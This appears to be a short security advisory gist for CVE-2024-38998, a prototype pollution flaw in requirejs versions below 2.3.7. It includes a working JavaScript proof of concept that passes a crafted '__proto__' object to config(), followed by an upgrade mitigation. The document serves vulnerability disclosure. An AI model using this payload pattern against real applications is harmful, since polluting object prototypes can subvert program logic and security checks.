@tariqhawis
Last active September 11, 2024 18:12
[CVE-2024-38998] A Prototype Pollution vulnerability Affecting requirejs package, versions < 2.3.7

Overview

Affected versions of this module are vulnerable to Prototype Pollution because of a missing check for whether the argument resolves to the object prototype. This allows an attacker to inject a malicious property through the built-in Object property __proto__, after which the injected property is inherited by every object in the program.

PoC

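(async () => {
  // Load RequireJS (affected versions: < 2.3.7).
  const lib = await import('requirejs');
  // JSON.parse creates "__proto__" as an own property of the parsed object.
  const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');

  const victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // Pass the crafted object to config(); any error it throws is ignored.
    lib.default.config(BAD_JSON);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Remove the injected property so the rest of the process is not affected.
  delete Object.prototype.polluted;
})();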

Mitigation

Upgrade the package to the latest version, 2.3.7